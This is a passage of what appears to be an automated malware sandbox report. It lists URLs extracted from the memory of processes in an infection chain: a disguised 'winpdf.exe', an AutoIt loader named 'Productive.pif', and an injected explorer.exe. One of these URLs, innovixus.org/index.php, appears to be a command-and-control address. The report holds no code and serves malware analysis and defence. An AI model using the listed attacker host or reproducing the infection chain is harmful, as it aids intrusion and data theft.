        Source: explorer.exe, 00000012.00000002.20536514758.00000000035F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovixus.org:80/index.php11
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe, 00000003.00000000.19321751854.0000000000408000.00000002.00000001.01000000.00000007.sdmp, winpdf.exe, 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmp, winpdf.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CC75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20181642374.000000000CD4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20005267451.000000000CD4B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: http://ocsp.digicert.com0N
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: http://ocsp.digicert.com0O
        Source: explorer.exe, 00000010.00000003.20181642374.000000000CD4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20005267451.000000000CD4B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl
        Source: winpdf.exe, 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmp, winpdf.exe, 00000003.00000003.19328350189.000000000502F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175205390.0000000011C9D000.00000004.00000001.00020000.00000000.sdmp, Productive.pif.4.dr, Fluid.3.dr, fejhsit.16.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
        Source: winpdf.exe, 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmp, winpdf.exe, 00000003.00000003.19328350189.000000000502F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175205390.0000000011C9D000.00000004.00000001.00020000.00000000.sdmp, Productive.pif.4.dr, Fluid.3.dr, fejhsit.16.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
        Source: winpdf.exe, 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmp, winpdf.exe, 00000003.00000003.19328350189.000000000502F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175205390.0000000011C9D000.00000004.00000001.00020000.00000000.sdmp, Productive.pif.4.dr, Fluid.3.dr, fejhsit.16.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
        Source: powershell.exe, 00000000.00000002.19477320488.0000024CC133D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19418224376.0000024CA92A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000000.00000002.19418224376.0000024CA92A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz$
        Source: explorer.exe, 00000010.00000000.19996823033.0000000002AC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.20003237784.000000000A510000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.20002205711.0000000009620000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: explorer.exe, 00000010.00000000.20005267451.000000000D11E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175747227.000000000D11E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.microH
        Source: powershell.exe, 00000000.00000002.19418224376.0000024CA9081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: winpdf.exe, 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmp, winpdf.exe, 00000003.00000003.19328350189.000000000502F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175205390.0000000011C9D000.00000004.00000001.00020000.00000000.sdmp, Productive.pif.4.dr, Fluid.3.dr, fejhsit.16.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
        Source: winpdf.exe, 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmp, winpdf.exe, 00000003.00000003.19328350189.000000000502F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175205390.0000000011C9D000.00000004.00000001.00020000.00000000.sdmp, Productive.pif.4.dr, Fluid.3.dr, fejhsit.16.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
        Source: powershell.exe, 00000000.00000002.19477320488.0000024CC133D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19418224376.0000024CA92A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000000.00000002.19418224376.0000024CA92A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz$
        Source: winpdf.exe, 00000003.00000003.19328350189.000000000502F000.00000004.00000020.00020000.00000000.sdmp, Productive.pif, 0000000D.00000000.19350735168.0000000000379000.00000002.00000001.01000000.00000009.sdmp, Productive.pif, 0000000F.00000002.20019196014.0000000000379000.00000002.00000001.01000000.00000009.sdmp, explorer.exe, 00000010.00000003.20175205390.0000000011C9D000.00000004.00000001.00020000.00000000.sdmp, fejhsit, 00000011.00000002.24416250287.00000000009A9000.00000002.00000001.01000000.0000000B.sdmp, Productive.pif.4.dr, Fluid.3.dr, fejhsit.16.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF1D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20178509217.000000000CF1D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF3D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
        Source: powershell.exe, 00000000.00000002.19477320488.0000024CC1326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: F42C.tmp.18.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: explorer.exe, 00000010.00000000.19995602950.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEM
        Source: explorer.exe, 00000010.00000003.20180551346.0000000009073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20000801712.000000000905C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
        Source: powershell.exe, 00000000.00000002.19418224376.0000024CA9081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: explorer.exe, 00000010.00000003.20181413547.0000000008F0E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20000280078.0000000008F0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 00000010.00000003.20181413547.0000000008F0E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20000280078.0000000008F0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSds
        Source: explorer.exe, 00000010.00000003.20181413547.0000000008F0E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20000280078.0000000008F0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSy
        Source: explorer.exe, 00000010.00000000.20000801712.0000000009138000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20180551346.0000000009138000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CC75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=3B289069BAFD4CBAB2367863A646CEB0&timeOut=5000&oc
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CC75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?p%
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CC75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 00000010.00000000.20000801712.0000000009138000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20180551346.0000000009138000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.compEP#
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/AAehR3S.png
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/AAehR3S.svg
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240908.1/Weather/W01_Sunn
        Source: F42C.tmp.18.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: explorer.exe, 00000010.00000000.20000280078.0000000008E50000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/bi
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8-dark
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gD5m
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gD5m-dark
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: F519.tmp.18.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: explorer.exe, 00000012.00000003.20230614437.0000000003670000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.20228308712.000000000365F000.00000004.00000020.00020000.00000000.sdmp, F42C.tmp.18.dr, F519.tmp.18.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: F519.tmp.18.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: explorer.exe, 00000010.00000000.20005267451.000000000D11E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175747227.000000000D11E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com/
        Source: F42C.tmp.18.drString found in binary or memory: https://gemini.google.com/app?q=
        Source: powershell.exe, 00000000.00000002.19477320488.0000024CC133D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19418224376.0000024CA92A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000000.00000002.19418224376.0000024CA92A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz$
        Source: powershell.exe, 00000000.00000002.19477320488.0000024CC1360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co8
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1lLvot.img
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1tCCWq.img
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1tCK3x.img
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1tCsqn.img
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1tCtNr.img
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1tCybi.img
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA36Tom.img
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAywOab.img
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
        Source: explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBERG9W.img
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
        Source: F255.tmp.18.drString found in binary or memory: https://login.live.com/
        Source: explorer.exe, 00000012.00000003.20222715689.0000000003641000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.20223826650.0000000005ECC000.00000004.00000020.00020000.00000000.sdmp, F255.tmp.18.drString found in binary or memory: https://login.live.com//
        Source: explorer.exe, 00000012.00000003.20222715689.0000000003641000.00000004.00000020.00020000.00000000.sdmp, F255.tmp.18.drString found in binary or memory: https://login.live.com/https://login.live.com/
        Source: explorer.exe, 00000012.00000003.20222715689.0000000003641000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.20223826650.0000000005ECC000.00000004.00000020.00020000.00000000.sdmp, F255.tmp.18.drString found in binary or memory: https://login.live.com/v104
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000000.00000002.19477320488.0000024CC1326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: explorer.exe, 00000010.00000000.20005267451.000000000D11E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175747227.000000000D11E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF1D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20178509217.000000000CF1D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEM_
        Source: explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod-streaming-video-msn-com.akamaized.net/v1/eus002/1dfa1a8e-b8a8-4bc2-be5e-efbf974bc93c/38
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod-streaming-video-msn-com.akamaized.net/v1/eus002/45196b67-6f8e-4788-892e-10a816c5a76b/3b
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://prod-video-cms-amp-microsoft-com.akamaized.net/tenant/amp/entityid/AA1tCw0P?blobrefkey=close
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://stacker.com/stories
        Source: explorer.exe, 00000012.00000003.20230614437.0000000003670000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.20228308712.000000000365F000.00000004.00000020.00020000.00000000.sdmp, F42C.tmp.18.dr, F519.tmp.18.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: explorer.exe, 00000012.00000003.20230614437.0000000003670000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.20228308712.000000000365F000.00000004.00000020.00020000.00000000.sdmp, F42C.tmp.18.dr, F519.tmp.18.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-us&chosenMarketReason=implicitNew
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-us&chosenMarketReason=implicitNew
        Source: explorer.exe, 00000010.00000000.20000280078.0000000008E50000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/_;
        Source: explorer.exe, 00000010.00000000.20005267451.000000000D11E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175747227.000000000D11E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
        Source: winpdf.exe, 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmp, winpdf.exe, 00000003.00000003.19328350189.000000000502F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175205390.0000000011C9D000.00000004.00000001.00020000.00000000.sdmp, Productive.pif.4.dr, Fluid.3.dr, fejhsit.16.drString found in binary or memory: https://www.autoitscript.com/autoit3/
        Source: powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
        Source: explorer.exe, 00000012.00000003.20228308712.000000000365F000.00000004.00000020.00020000.00000000.sdmp, F42C.tmp.18.drString found in binary or memory: https://www.ecosia.org/newtab/
        Source: fejhsit.16.drString found in binary or memory: https://www.globalsign.com/repository/0
        Source: winpdf.exe, 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmp, winpdf.exe, 00000003.00000003.19328350189.000000000502F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175205390.0000000011C9D000.00000004.00000001.00020000.00000000.sdmp, Productive.pif.4.dr, Fluid.3.dr, fejhsit.16.drString found in binary or memory: https://www.globalsign.com/repository/06
        Source: explorer.exe, 00000012.00000003.20228308712.000000000365F000.00000004.00000020.00020000.00000000.sdmp, F42C.tmp.18.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
        Source: explorer.exe, 00000012.00000003.20230614437.0000000003670000.00000004.00000020.00020000.00000000.sdmp, F519.tmp.18.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/autos/other/the-5-most-stolen-cars-in-america-and-the-5-least-stolen-cars-
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/entertainment/news/drumming-legends-25-masters-who-reinvented-the-rhythm/s
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/feed
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/recipes/i-asked-3-butchers-how-to-choose-the-best-steak-they-
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/if-your-life-revolves-around-your-cat-here-35-thi
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/the-greatest-gowns-that-queen-elizabeth-meghan-ma
